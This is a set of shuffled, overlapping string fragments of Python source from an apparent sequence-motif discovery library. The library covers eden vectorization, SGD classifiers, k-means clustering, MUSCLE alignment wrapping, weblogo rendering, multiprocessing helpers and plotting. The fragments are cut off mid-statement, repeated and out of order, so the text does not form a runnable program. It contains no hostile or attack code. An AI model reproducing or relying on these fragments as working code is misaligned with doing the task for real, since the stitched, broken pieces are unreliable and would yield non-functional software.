"= time.time() matrices = [] for i, p in enumerate(results): loc_start_time = time.time()",
"%s' % motif['consensus_seq'] logo_txt.append(info) info = ' - consensus regex: %s' % motif['regex_seq']",
"> regex_th: if letter != '-': code.append(letter) if len(code) == 0: code_str =",
"\"\"\"plot_cumulative_score.\"\"\" sig = cumulative_score(seqs, smod) plt.figure(figsize=size) sigp = np.copy(sig) sigp[sigp < 0] =",
"or freq >= freq_th: if std_th is None or std <= std_th: _motives[cluster_id]",
"self.b = 1 def ecdf(self, x): \"\"\"Empirical cumulative distribution function.\"\"\" xs = np.sort(x)",
"+ 1) / float(len(xs)) return xs, ys def fit(self, scores): \"\"\"fit.\"\"\" if scores:",
"wbl.eps_formatter(data, format) # ------------------------------------------------------------------------------ class SequenceMotifDecomposer(BaseEstimator, ClassifierMixin): \"\"\"SequenceMotifDecomposer.\"\"\" def __init__(self, complexity=5, n_clusters=10, min_subarray_size=4,",
"d_loc_time)) pool.close() pool.join() return estimator def multiprocess_performance(pos_iterable, neg_iterable, vectorizer=None, estimator=None, pos_block_size=100, neg_block_size=100, n_jobs=-1):",
"= n.get() y += [-1] * neg_data_matrix.shape[0] y = np.array(y) data_matrix = vstack([pos_data_matrix,",
"ClassifierMixin): \"\"\"SequenceMotifDecomposer.\"\"\" def __init__(self, complexity=5, n_clusters=10, min_subarray_size=4, max_subarray_size=10, estimator=SGDClassifier(warm_start=True), class_estimator=SGDClassifier(), clusterer=MiniBatchKMeans(), pos_block_size=300, neg_block_size=300,",
"norm_cooccurence_mtx = np.vstack(cooccurence_list) return orig_cooccurence_mtx, norm_cooccurence_mtx, distances def plot_distance(cluster_id_i, cluster_id_j, regex_i, regex_j, distances,",
"estimator=None, min_subarray_size=5, max_subarray_size=10): \"\"\"serial_subarray.\"\"\" annotated_seqs = vectorizer.annotate(iterable, estimator=estimator) subarrays_items = [] for (orig_header,",
"{'consensus_seq': consensus_seq, 'regex_seq': regex_seq, 'trimmed_align_seqs': trimmed_align_seqs, 'align_seqs': align_seqs, 'seqs': seqs} return True, motif",
"ys = np.arange(1, len(xs) + 1) / float(len(xs)) return xs, ys def fit(self,",
"[id for id in motives] seqs_summary = defaultdict(list) for seq_id, begin, end, i",
"s in haystack: matches = re.findall(needle, s, overlapped=True) if len(matches): yield 1 else:",
"+ fname + '\"></p>') return '\\n'.join(txt) def report(self, pos_seqs, all_seqs, motives, nbins=40, size=(17,",
"alpha=0.3, color='g') sign = np.copy(sig) sign[sign >= 0] = 0 plt.bar(range(len(sign)), sign, alpha=0.3,",
"in subarrays: subseq_seq = subarray['subarray_string'] begin = subarray['begin'] end = subarray['end'] score =",
"len(haystack) return counts, float(counts) / size def extract_consensus(seqs, motives, regex_th): \"\"\"extract_consensus.\"\"\" for id",
"\"\"\"multiprocess_vectorize.\"\"\" start_time = time.time() if n_jobs == -1: pool = mp.Pool() else: pool",
"std_loc def hits(motives, ids=None): \"\"\"hits.\"\"\" for i in ids: for h, s in",
"ClassifierMixin from sklearn.linear_model import SGDClassifier from sklearn.cluster import MiniBatchKMeans from eden.sequence import Vectorizer",
"%s (%.2f secs) (delta: %.2f)' % (i, size, d_time, d_loc_time)) pool.close() pool.join() return",
"header += '<score>%.4f<score>' % (score) header += '<subseq>%s<subseq>' % (subseq_seq) subseq = (header,",
"subseq except Exception as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True)",
"align_seq] concat_str = np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) size = len(trimmed_align_seqs) for",
"interfere cluster_seqs = [] for cluster_id in clusters: if len(clusters[cluster_id]) > 0: seqs",
"range(half_windw_size, sig_len - half_windw_size): min_sig = np.min(sig[i - half_windw_size:i + half_windw_size]) if min_sig",
"from Bio.SeqRecord import SeqRecord from corebio.seq import Alphabet, SeqList import weblogolib as wbl",
"s in haystack: for match in re.finditer(needle, s): s = match.start() e =",
"in i d_ij = [] for c_i in centers[i]: for c_j in centers[j]:",
"= wb.create_logo(seqs=motif['trimmed_align_seqs']) logo_txt = [] info = ' - num subarrays: %d' %",
"bbox_inches='tight', transparent=True, pad_inches=0) else: figname = None plt.show() plt.close() return figname def extract_location(needle,",
"seq += str(line_str[0]).strip() if seq: yield seq # ------------------------------------------------------------------------------ class MuscleAlignWrapper(object): \"\"\"A wrapper",
"begin, end, i in hits(motives, ids=ids): seqs_summary[seq_id].append((begin, end, i)) distances = defaultdict(list) size",
"None: if len(sig) >= median_len: sigs = sig[:median_len] else: if len(sig) >= median_len:",
"= popt else: logger.debug('Warning: reverting to default values') logger.debug('ECDF fit on %d values'",
"distances[(cluster_id, j)] info = ' - num co-occurences %d %s vs %d %s:",
"alphabet = Alphabet('ACDEFGHIKLMNPQRSTVWY') else: alphabet = Alphabet('AGCT') motif_corebio = SeqList(alist=instances, alphabet=alphabet) data =",
"clusters: raise Exception('Error: No clusters.') mcs = min_cluster_size logger.debug('Alignment') motives = dict() for",
"width = max(box_decomposition(sig, half_windw_size)) logger.debug('val:%.1f beg:%s end:%s width:%s' % (val, start, end, width))",
"= Alphabet('ACDEFGHIKLMNPQRSTVWY') else: alphabet = Alphabet('AGCT') motif_corebio = SeqList(alist=instances, alphabet=alphabet) data = wbl.LogoData().from_seqs(motif_corebio)",
"1 - y return p_val def compute_clusters(self, seqs=None, p_value=0.05): \"\"\"compute_clusters.\"\"\" try: subsequences =",
"seqs) yield freq, id, c_regex, counts, motives[id]['consensus_seq'] def plot_location(needle, haystack, cluster_id=None, nbins=20, size=(17,",
"= cumulative_score(seqs, smod) val, start, end, width = max(box_decomposition(sig, half_windw_size)) logger.debug('val:%.1f beg:%s end:%s",
"np.sort(x) ys = np.arange(1, len(xs) + 1) / float(len(xs)) return xs, ys def",
"\"\"\"select_motives.\"\"\" orig_clusters = self.compute_clusters(seqs, p_value=p_value) motives = self.compute_motives( orig_clusters, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th,",
"orig_seq), (seq, score) in zip(iterable, annotated_seqs): subarrays = compute_max_subarrays_sequence( seq=seq, score=score, min_subarray_size=min_subarray_size, max_subarray_size=max_subarray_size,",
"pool.join() data_matrix = vstack(matrices) return data_matrix def multiprocess_fit(pos_iterable, neg_iterable, vectorizer=None, estimator=None, pos_block_size=100, neg_block_size=100,",
"+ '\" style=\"width: 100%\"></p>') else: if output_type == 'pdf': txt.append('<p align=\"left\"><img src=\"file://' +",
"for i, row in enumerate(cooccurence_mtx): norm = row[i] if norm != 0: row",
"= c.most_common() l = letter_regex(k, size, regex_th=regex_th) if l: code += l return",
"ms = sorted([m for m in self._identify_mergeable_clusters( motives, similarity_th=similarity_th)], reverse=True) success = False",
"2), output_type='screen', fname=None): \"\"\"Report in markdown format.\"\"\" txt = [] if motives: _,",
"stdout = self._perform_ma(data) aligned_seqs = self._fasta_to_seqs(headers, stdout) return aligned_seqs # ------------------------------------------------------------------------------ class Weblogo(object):",
"for i in motives], reverse=True): info = '#### Motif id: %d' % cluster_id",
"in chunks(iterable, block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Predicting') start_time =",
"it over-rides tool.alphabet alphabet='dna', # ['dna', 'rna', 'protein'] ): \"\"\"Initialize an instance.\"\"\" self.diags",
"in c[:, 0:2]: if id1 < len(cluster_seqs): orders.append(int(id1)) if id2 < len(cluster_seqs): orders.append(int(id2))",
"= metrics.confusion_matrix(y_test, y_binary) np.set_printoptions(precision=2) logger.info('Confusion matrix:') logger.info(cm) # classification logger.info('Classification:') logger.info(metrics.classification_report(y_test, y_binary)) #",
"= estimator.decision_function(data_matrix) preds.append(pred) binary_pred = estimator.predict(data_matrix) binary_preds.append(binary_pred) d_time = time.time() - start_time d_loc_time",
"logger.debug('Vectorizing') start_time = time.time() matrices = [] for i, p in enumerate(results): loc_start_time",
"plt.title(needle) plt.xlabel('Position') plt.ylabel('Num occurrences') if fname: plt.draw() figname = '%s_loc_%d.png' % (fname, cluster_id)",
"multiprocess_fit(pos_iterable, neg_iterable, vectorizer=None, estimator=None, pos_block_size=100, neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_fit.\"\"\" start_time = time.time() classes =",
"diags self.maxiters = maxiters self.maxhours = maxhours if alphabet == 'protein': self.alphabet =",
"c_j distances[(i, j)].append(selected) cooccurence_mtx = np.nan_to_num(cooccurence_mtx) orig_cooccurence_mtx = cooccurence_mtx.copy() cooccurence_list = [] for",
"start_time = time.time() classes = np.array([1, -1]) if n_jobs == -1: pool =",
"match.end() m = s + (e - s) / 2 locs.append(m) plt.figure(figsize=size) n,",
"def trim_seqs(seqs, smod, half_windw_size=7): \"\"\"trim_seqs.\"\"\" sig = cumulative_score(seqs, smod) val, start, end, width",
"np.array([1, -1]) if n_jobs == -1: pool = mp.Pool() else: pool = mp.Pool(n_jobs)",
"\\ (cluster_id, motives[cluster_id]['consensus_seq']) txt.append(info) for freq, cluster_id in sorted([(motives[i]['freq'], i) for i in",
"1): start = ids[i] end = ids[i + 1] width = end -",
"parametrized sigmoid on the empirical cumulative distribution.\"\"\" def __init__(self, random_state=1): \"\"\"Constructor.\"\"\" self.random_state =",
"+ ':' new_header += str(end) + '<loc>' subsequences.append((new_header, subseq)) if not subsequences: raise",
"score in multiprocess_score(seqs, vectorizer=self.vectorizer, estimator=self.estimator, block_size=self.pos_block_size, n_jobs=self.n_jobs): yield score except Exception as e:",
"'-': to_be_removed.append(i) val = k[1][1] else: val = k[0][1] if float(val) / dim",
"np.hstack(true_targets) return preds, binary_preds, true_targets def serial_subarray(iterable, vectorizer=None, estimator=None, min_subarray_size=5, max_subarray_size=10): \"\"\"serial_subarray.\"\"\" annotated_seqs",
"True if self.maxhours is not None: params['maxhours'] = self.maxhours muscle_cline = MuscleCommandline(**params) stdout,",
"logo_range=list(), # composition = 'auto', scale_stack_widths=True, error_bars=True, title='', figure_label='', show_x_axis=True, x_label='', show_y_axis=True, y_label='',",
"loc = header.split('<loc>')[1] begin, end = loc.split(':') begin = int(begin) end = int(end)",
"= np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) seq = '' for i, row",
"!= cluster_id: regex_j = motives[j]['regex_seq'] ds = distances[(cluster_id, j)] info = ' -",
"def letter_regex(k, size, regex_th=0.3): \"\"\"letter_regex.\"\"\" code = [] for letter, count in k:",
"begin, end, p, subseq in iterable: new_header = header new_header += '<loc>' +",
"self.clusters except Exception as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True)",
"in motives: regex_i = motives[i]['regex_seq'] if j != cluster_id: regex_j = motives[j]['regex_seq'] ds",
"for subarray in subarrays: subseq_seq = subarray['subarray_string'] begin = subarray['begin'] end = subarray['end']",
"d_loc_time)) pool.close() pool.join() data_matrix = vstack(matrices) return data_matrix def multiprocess_fit(pos_iterable, neg_iterable, vectorizer=None, estimator=None,",
"show_ends=False, # ['auto','base','pairing','charge','chemistry','classic','monochrome'] color_scheme='classic', resolution=96, fineprint='', ): \"\"\"Initialize an instance.\"\"\" options = wbl.LogoOptions()",
"min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) motives = self.merge( motives, similarity_th=similarity_th, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size,",
"%d' % (co) txt.append(info) info = ' - freq of occurrences of regex:",
"= ecdf(scores) popt, pcov = curve_fit(sigmoid, xs, ys) self.a, self.b = popt else:",
"as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def decomposition_scores(self, seqs=None):",
"pool = mp.Pool(n_jobs) results = [apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for seqs in",
"if motives.get(i, None) and motives.get(j, None): n_i = len(motives[i]['seqs']) n_j = len(motives[j]['seqs']) seqs",
"- freq of occurrences of regex: %.2f' % (fr) txt.append(info) av = motives[cluster_id]['avg_pos']",
"output_type=output_type)) for j in motives: regex_i = motives[i]['regex_seq'] if j != cluster_id: regex_j",
"__init__(self, complexity=5, n_clusters=10, min_subarray_size=4, max_subarray_size=10, estimator=SGDClassifier(warm_start=True), class_estimator=SGDClassifier(), clusterer=MiniBatchKMeans(), pos_block_size=300, neg_block_size=300, n_jobs=-1): \"\"\"Construct.\"\"\" self.complexity",
"estimator=None, block_size=100, n_jobs=-1): \"\"\"multiprocess_score.\"\"\" start_time = time.time() if n_jobs == -1: pool =",
"value): \"\"\"pvalue.\"\"\" y = sigmoid(value, self.a, self.b) p_val = 1 - y return",
"self.options.sequence_type is 'rna': alphabet = Alphabet('ACGU') elif self.options.sequence_type is 'protein': alphabet = Alphabet('ACDEFGHIKLMNPQRSTVWY')",
"int(begin), int(end), i) def compute_cooccurence(motives, ids=None): \"\"\"compute_cooccurence.\"\"\" if ids is None: ids =",
"\"\"\"Carry out alignment.\"\"\" headers, data = self._seq_to_stdin_fasta(seqs) stdout = self._perform_ma(data) aligned_seqs = self._fasta_to_seqs(headers,",
"' - consensus regex: %s' % motif['regex_seq'] logo_txt.append(info) return logo_image, logo_txt def compute_logos(self,",
"= np.sort(x) ys = np.arange(1, len(xs) + 1) / float(len(xs)) return xs, ys",
"Counter from sklearn import metrics from eden.util.NeedlemanWunsh import edit_distance import random import pylab",
"= np.percentile(locs, 70) - np.percentile(locs, 30) else: avg_loc = -1 std_loc = 0",
"in k: if count / float(size) > regex_th: if letter != '-': code.append(letter)",
"s + (e - s) / 2 locs.append(m) if locs: avg_loc = np.percentile(locs,",
"p_val = 1 - y return p_val def compute_clusters(self, seqs=None, p_value=0.05): \"\"\"compute_clusters.\"\"\" try:",
"def extract_location(needle, haystack): \"\"\"extract_location.\"\"\" locs = [] for h, s in haystack: for",
"counts, float(counts) / size def extract_consensus(seqs, motives, regex_th): \"\"\"extract_consensus.\"\"\" for id in motives:",
"Alphabet('ACDEFGHIKLMNPQRSTVWY') else: alphabet = Alphabet('AGCT') motif_corebio = SeqList(alist=instances, alphabet=alphabet) data = wbl.LogoData().from_seqs(motif_corebio) format",
"matrix K cluster_vecs = Vectorizer(complexity).transform(cluster_seqs) gram_matrix = metrics.pairwise.pairwise_kernels( cluster_vecs, metric='linear') c = linkage(gram_matrix,",
"\"\"\"chunks.\"\"\" iterable = iter(iterable) while True: items = [] for i in range(n):",
"locs, nbins, normed=0, facecolor='blue', alpha=0.3) plt.grid() plt.title(needle) plt.xlabel('Position') plt.ylabel('Num occurrences') if fname: plt.draw()",
"max_subarray_size=10, block_size=100, n_jobs=-1): \"\"\"multiprocess_subarray.\"\"\" start_time = time.time() if n_jobs == -1: pool =",
"locs.append(m) plt.figure(figsize=size) n, bins, patches = plt.hist( locs, nbins, normed=0, facecolor='blue', alpha=0.3) plt.grid()",
"= sigs + sig[:median_len] sig = np.array(sigs) / float(len(seqs)) return sig def trim_seqs(seqs,",
"y_label='', y_axis_tic_spacing=1.0, show_ends=False, # ['auto','base','pairing','charge','chemistry','classic','monochrome'] color_scheme='classic', resolution=96, fineprint='', ): \"\"\"Initialize an instance.\"\"\" options",
"gap_penalty=-1) rel_nw_score = 2 * nw_score / (len(seq_i) + len(seq_j)) if rel_nw_score >",
"in seqs_summary[seq_id]: centers[cluster_id].append(begin + (end - begin) / 2) cluster_ids = set(cluster_ids) for",
"= 'classic' wb = Weblogo(output_format='png', sequence_type=alphabet, resolution=200, stacks_per_line=60, units='bits', color_scheme=color_scheme) logo_image = wb.create_logo(seqs=motif['trimmed_align_seqs'])",
"report(self, pos_seqs, all_seqs, motives, nbins=40, size=(17, 2), output_type='screen', fname=None): \"\"\"Report in markdown format.\"\"\"",
"width def cumulative_score(seqs, smod): \"\"\"cumulative_score.\"\"\" median_len = np.median([len(s) for h, s in seqs])",
"= ' - num subarrays: %d' % len(motif['seqs']) logo_txt.append(info) info = ' -",
"= -4, 1 scores = [score for header, score, begin, end, subseq in",
"= time.time() preds = [] binary_preds = [] true_targets = [] for i,",
"in align_seq] concat_str = np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) size = len(trimmed_align_seqs)",
"n, bins, patches = plt.hist( locs, nbins, normed=0, facecolor='blue', alpha=0.3) plt.grid() plt.title(needle) plt.xlabel('Position')",
"seq def _compute_score(self, align_seqs, min_freq=0.8): dim = len(align_seqs) cluster = [] for h,",
"seq, score in annotated_seqs] return scores def multiprocess_score(iterable, vectorizer=None, estimator=None, block_size=100, n_jobs=-1): \"\"\"multiprocess_score.\"\"\"",
"BaseEstimator, ClassifierMixin from sklearn.linear_model import SGDClassifier from sklearn.cluster import MiniBatchKMeans from eden.sequence import",
"n_jobs=self.n_jobs) # confusion matrix cm = metrics.confusion_matrix(y_test, y_binary) np.set_printoptions(precision=2) logger.info('Confusion matrix:') logger.info(cm) #",
"params: a:%.2f b:%.2f' % (self.a, self.b)) def predict(self, value): \"\"\"pvalue.\"\"\" y = sigmoid(value,",
"show_y_axis=True, y_label='', y_axis_tic_spacing=1.0, show_ends=False, # ['auto','base','pairing','charge','chemistry','classic','monochrome'] color_scheme='classic', resolution=96, fineprint='', ): \"\"\"Initialize an instance.\"\"\"",
"logger.debug('Performance evaluation') start_time = time.time() preds = [] binary_preds = [] true_targets =",
"if p <= p_value: yield orig_header, begin, end, p, subseq except Exception as",
"block_size=self.pos_block_size, n_jobs=self.n_jobs): yield score except Exception as e: logger.debug('Failed iteration. Reason: %s' %",
"len(motives) txt.append(info) figname = plot_cumulative_score( self, pos_seqs, size=size, fname=fname) txt.append(self._wrap_image(figname, output_type=output_type)) for freq,",
"x): \"\"\"Empirical cumulative distribution function.\"\"\" xs = np.sort(x) ys = np.arange(1, len(xs) +",
"'<score>%.4f<score>' % (score) header += '<subseq>%s<subseq>' % (subseq_seq) subseq = (header, seq) subseqs.append(subseq)",
"in enumerate(results): loc_start_time = time.time() pos_data_matrix = p.get() matrices += pos_data_matrix d_time =",
"(#%d) (%.2f secs)' % (cluster_id, len(clusters[cluster_id]), dtime)) logger.debug('After motives computation, %d motives' %",
"1 scores = [score for header, score, begin, end, subseq in self.decomposition_scores(seqs)] if",
"start = ids[i] end = ids[i + 1] width = end - start",
"joblib.dump(self, model_name, compress=1) def load(self, obj): \"\"\"load.\"\"\" self.__dict__.update(joblib.load(obj).__dict__) def fit(self, pos_seqs=None, neg_seqs=None): \"\"\"fit.\"\"\"",
"neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_performance.\"\"\" start_time = time.time() if n_jobs == -1: pool = mp.Pool()",
"of regex: %d' % (co) txt.append(info) info = ' - freq of occurrences",
"h, align_seq in trimmed_align_seqs: str_list = [c for c in align_seq] concat_str =",
"code[0] else: code_str = '(' + '|'.join(code) + ')' return code_str def consensus_regex(trimmed_align_seqs,",
"for c in align_seq] concat_str = np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) seq",
"return motives def compute_logo(self, cluster_id=None, motif=None): \"\"\"compute_logo.\"\"\" alphabet = 'rna' color_scheme = 'classic'",
"in iterable: new_header = header new_header += '<loc>' + str(begin) + ':' new_header",
"in enumerate(cooccurence_mtx): norm = row[i] if norm != 0: row /= norm else:",
"facecolor='green', alpha=0.3) plt.grid() plt.title('%s vs %s' % (regex_i, regex_j)) plt.xlabel('Relative position') plt.ylabel('Num occurrences')",
"(delta: %.2f)' % (i, size, d_time, d_loc_time)) pool.close() pool.join() preds = np.hstack(preds) binary_preds",
"= True dtime = time.time() - start_time logger.debug('...done in %.2f secs' % (dtime))",
"subseq in iterable: new_header = header new_header += '<loc>' + str(begin) + ':'",
"block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Predicting') start_time = time.time() scores_items",
"logo to compute. Try more permissive parameters.') def _save_logo(self, logo, cluster_id, fname): imagename",
"subarray was selected. Increase p_value.') logger.debug('Working on: %d fragments' % len(subsequences)) n =",
"if y_label: options.yaxis_label = y_label options.yaxis_tic_interval = y_axis_tic_spacing options.show_ends = show_ends options.color_scheme =",
"False for rel_nw_score, i, j in ms: if motives.get(i, None) and motives.get(j, None):",
"\"\"\"consensus_regex.\"\"\" cluster = [] for h, align_seq in trimmed_align_seqs: str_list = [c for",
"def __init__(self, diags=False, maxiters=16, maxhours=None, # TODO: check if this alphabet is required",
"complexity=3): sep = ' ' * (complexity * 2) # join all sequences",
"serial_pre_process, args=(seqs, vectorizer)) for seqs in chunks(neg_iterable, neg_block_size)] logger.debug('Setup %.2f secs' % (time.time()",
"figure_label: options.logo_label = figure_label options.show_xaxis = show_x_axis if x_label: options.xaxis_label = x_label options.show_yaxis",
"alpha=0.3, color='r') plt.grid() plt.xlabel('Position') plt.ylabel('Importance score') if fname: plt.draw() figname = '%s_importance.png' %",
"'auto', scale_stack_widths=True, error_bars=True, title='', figure_label='', show_x_axis=True, x_label='', show_y_axis=True, y_label='', y_axis_tic_spacing=1.0, show_ends=False, # ['auto','base','pairing','charge','chemistry','classic','monochrome']",
"if i != j: # find closest instance j from any instance in",
"sklearn import metrics from eden.util.NeedlemanWunsh import edit_distance import random import pylab as plt",
"import joblib from scipy.optimize import curve_fit import multiprocessing logger = logging.getLogger(__name__) def sigmoid(x,",
"on the empirical cumulative distribution.\"\"\" def __init__(self, random_state=1): \"\"\"Constructor.\"\"\" self.random_state = random_state self.a",
"if self.clusterer_is_fit: preds = self.class_estimator.predict(data_matrix) else: preds = self.clusterer.fit_predict(data_matrix) self.class_estimator.fit(data_matrix, preds) self.clusterer_is_fit =",
"on %d instances' % data_matrix.shape[0]) start_time = time.time() self.clusterer.set_params(n_clusters=self.n_clusters) if self.clusterer_is_fit: preds =",
"logger.debug('Exception', exc_info=True) def _order_clusters(self, clusters, complexity=3): sep = ' ' * (complexity *",
">= min_score and len(align_seqs) > min_cluster_size: return True else: return False def compute_motif(self,",
"import Seq from Bio.SeqRecord import SeqRecord from corebio.seq import Alphabet, SeqList import weblogolib",
"import pylab as plt import joblib from scipy.optimize import curve_fit import multiprocessing logger",
"return orders def _compute_consensus_seq(self, align_seqs): cluster = [] for h, align_seq in align_seqs:",
"avg_loc = np.percentile(locs, 50) std_loc = np.percentile(locs, 70) - np.percentile(locs, 30) else: avg_loc",
"in chunks(pos_iterable, pos_block_size)] neg_results = [apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for seqs in",
"= [a for i, a in enumerate(align_seq) if i not in to_be_removed] trimmed_align_seqs.append((h,",
"subarrays_items += subseqs return subarrays_items def multiprocess_subarray(iterable, vectorizer=None, estimator=None, min_subarray_size=5, max_subarray_size=10, block_size=100, n_jobs=-1):",
"return self except Exception as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception',",
"# ['protein','dna','rna'] ignore_lower_case=False, # ['bits','nats','digits','kT','kJ/mol','kcal/mol','probability'] units='bits', first_position=1, logo_range=list(), # composition = 'auto', scale_stack_widths=True,",
"# align with muscle is_high_quality, motif = self.compute_motif( seqs=clusters[cluster_id], min_score=min_score, min_freq=min_freq, min_cluster_size=mcs, regex_th=regex_th,",
"Counter(row) k = c.most_common() l = letter_regex(k, size, regex_th=regex_th) if l: code +=",
"min_subarray_size=5, max_subarray_size=10): \"\"\"serial_subarray.\"\"\" annotated_seqs = vectorizer.annotate(iterable, estimator=estimator) subarrays_items = [] for (orig_header, orig_seq),",
"clusters.') mcs = min_cluster_size logger.debug('Alignment') motives = dict() for cluster_id in clusters: start_time",
"(fname, cluster_id) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else: figname = None plt.show() plt.close()",
"begin = int(begin) end = int(end) subseq = header.split('<subseq>')[1] orig_header = header.split('<loc>')[0] return",
"= std if freq_th is None or freq >= freq_th: if std_th is",
"c_regex, counts, motives[id]['consensus_seq'] def plot_location(needle, haystack, cluster_id=None, nbins=20, size=(17, 2), fname=None): \"\"\"plot_location.\"\"\" locs",
"':' new_header += str(end) + '<loc>' subsequences.append((new_header, subseq)) if not subsequences: raise Exception('No",
"/ float(len(xs)) return xs, ys def fit(self, scores): \"\"\"fit.\"\"\" if scores: xs, ys",
"= compute_cooccurence(motives) info = '### Summary: %d motives' % len(motives) txt.append(info) figname =",
"neg_data_matrix]) pred = estimator.decision_function(data_matrix) preds.append(pred) binary_pred = estimator.predict(data_matrix) binary_preds.append(binary_pred) d_time = time.time() -",
"len(motives[i]['seqs']) n_j = len(motives[j]['seqs']) seqs = motives[i]['seqs'] + motives[j]['seqs'] is_high_quality, motif = self.compute_motif(",
"for i in ids: for h, s in motives[i]['seqs']: tokens = h.split('<loc>') seq_id",
"sig[:median_len] else: if len(sig) >= median_len: sigs = sigs + sig[:median_len] sig =",
"- start_time d_loc_time = time.time() - loc_start_time logger.debug('%d (%.2f secs) (delta: %.2f)' %",
"motives[cluster_id]['regex_seq'] figname = plot_location( regex_i, all_seqs, cluster_id=cluster_id, nbins=nbins, size=size, fname=fname) txt.append(self._wrap_image(figname, output_type=output_type)) for",
"n_i = len(motives[i]['seqs']) n_j = len(motives[j]['seqs']) seqs = motives[i]['seqs'] + motives[j]['seqs'] is_high_quality, motif",
"or std <= std_th: _motives[cluster_id] = motives[cluster_id] if len(_motives) == 0: logger.warning('Quality filter",
"for h, s in seqs]) sigs = None for scores in smod.score(seqs): sig",
"' - freq of occurrences of regex: %.2f' % (fr) txt.append(info) av =",
"j != cluster_id: regex_j = motives[j]['regex_seq'] ds = distances[(cluster_id, j)] info = '",
"scipy.optimize import curve_fit import multiprocessing logger = logging.getLogger(__name__) def sigmoid(x, a, b): \"\"\"sigmoid.\"\"\"",
"create_logo(self, seqs=[]): \"\"\"Create sequence logo for input sequences.\"\"\" # seperate headers headers, instances",
"self.compute_motif( seqs=clusters[cluster_id], min_score=min_score, min_freq=min_freq, min_cluster_size=mcs, regex_th=regex_th, sample_size=sample_size) if is_high_quality: motives[cluster_id] = motif dtime",
"'png_print': return wbl.png_print_formatter(data, format) elif self.output_format == 'jpeg': return wbl.jpeg_formatter(data, format) else: return",
"trimmed_align_seqs.append((h, ''.join(trimmed_align_seq))) return score, trimmed_align_seqs def _is_high_quality(self, seqs, min_score=4, min_freq=0.6, min_cluster_size=10, sample_size=200): ma",
"output_type=output_type)) for freq, cluster_id in sorted([(motives[i]['freq'], i) for i in motives], reverse=True): info",
"ys def letter_regex(k, size, regex_th=0.3): \"\"\"letter_regex.\"\"\" code = [] for letter, count in",
"def transform(self, seqs=[]): \"\"\"Carry out alignment.\"\"\" headers, data = self._seq_to_stdin_fasta(seqs) stdout = self._perform_ma(data)",
"return figname def mean_shift_decomposition(sig, half_windw_size=5): \"\"\"mean_shift_decomposition.\"\"\" sig_len = len(sig) for i in range(half_windw_size,",
"dtime = time.time() - start_time logger.debug( 'Cluster %d (#%d) (%.2f secs)' % (cluster_id,",
"size, d_time, d_loc_time)) pool.close() pool.join() data_matrix = vstack(matrices) return data_matrix def multiprocess_fit(pos_iterable, neg_iterable,",
"%d values' % (len(scores))) logger.debug('Optimal params: a:%.2f b:%.2f' % (self.a, self.b)) def compute_p_value(self,",
"(seq, score) in zip(iterable, annotated_seqs): subarrays = compute_max_subarrays_sequence( seq=seq, score=score, min_subarray_size=min_subarray_size, max_subarray_size=max_subarray_size, margin=1,",
"new_header = header new_header += '<loc>' + str(begin) + ':' new_header += str(end)",
"permissive parameters.') def _save_logo(self, logo, cluster_id, fname): imagename = '%s_logo_cl_%d.png' % (fname, cluster_id)",
"str(begin) + ':' new_header += str(end) + '<loc>' subsequences.append((new_header, subseq)) if not subsequences:",
"' - consensus sequence: %s' % motif['consensus_seq'] logo_txt.append(info) info = ' - consensus",
"seq_id = tokens[0] begin, end = tokens[1].split(':') yield (seq_id, int(begin), int(end), i) def",
"value): \"\"\"p_value.\"\"\" y = sigmoid(value, self.a, self.b) p_val = 1 - y return",
"norm != 0: row /= norm else: row = np.zeros(row.shape) row[i] = 0",
"classes = np.array([1, -1]) if n_jobs == -1: pool = mp.Pool() else: pool",
"import compute_max_subarrays_sequence from itertools import izip import time from sklearn.base import BaseEstimator, ClassifierMixin",
"'<loc>' subsequences.append((new_header, subseq)) if not subsequences: raise Exception('No subarray was selected. Increase p_value.')",
"if selected_abs == abs(c_i - c_j): selected = c_i - c_j distances[(i, j)].append(selected)",
"(regex_i, regex_j)) plt.xlabel('Relative position') plt.ylabel('Num occurrences') if fname: plt.draw() figname = '%s_dist_%d_vs_%d.png' %",
"elif self.options.sequence_type is 'protein': alphabet = Alphabet('ACDEFGHIKLMNPQRSTVWY') else: alphabet = Alphabet('AGCT') motif_corebio =",
"strict. Ignoring filter.') return motives else: logger.debug('After quality filter, %d motives' % len(_motives))",
"estimator=self.estimator, min_subarray_size=self.min_subarray_size, max_subarray_size=self.max_subarray_size, block_size=self.pos_block_size, n_jobs=self.n_jobs) for header, seq in subarrays_items: components = self._decompose_header(header)",
"if len(sig) >= median_len: sigs = sig[:median_len] else: if len(sig) >= median_len: sigs",
"Bio.Seq import Seq from Bio.SeqRecord import SeqRecord from corebio.seq import Alphabet, SeqList import",
"s, overlapped=True) if len(matches): yield 1 else: yield 0 def occurrences(needle, haystack): \"\"\"occurrences.\"\"\"",
"= line.split() if line_str: seq += str(line_str[0]).strip() if seq: yield seq # ------------------------------------------------------------------------------",
"headers, data = self._seq_to_stdin_fasta(seqs) stdout = self._perform_ma(data) aligned_seqs = self._fasta_to_seqs(headers, stdout) return aligned_seqs",
"% (time.time() - start_time)) logger.debug('Vectorizing') start_time = time.time() matrices = [] for i,",
"options.unit_name = units options.first_index = first_position if logo_range: options.logo_start = logo_range[0] options.logo_end =",
"clustering, %d motives' % len(self.clusters)) return self.clusters except Exception as e: logger.debug('Failed iteration.",
"len(sig) for i in range(half_windw_size, sig_len - half_windw_size): min_sig = np.min(sig[i - half_windw_size:i",
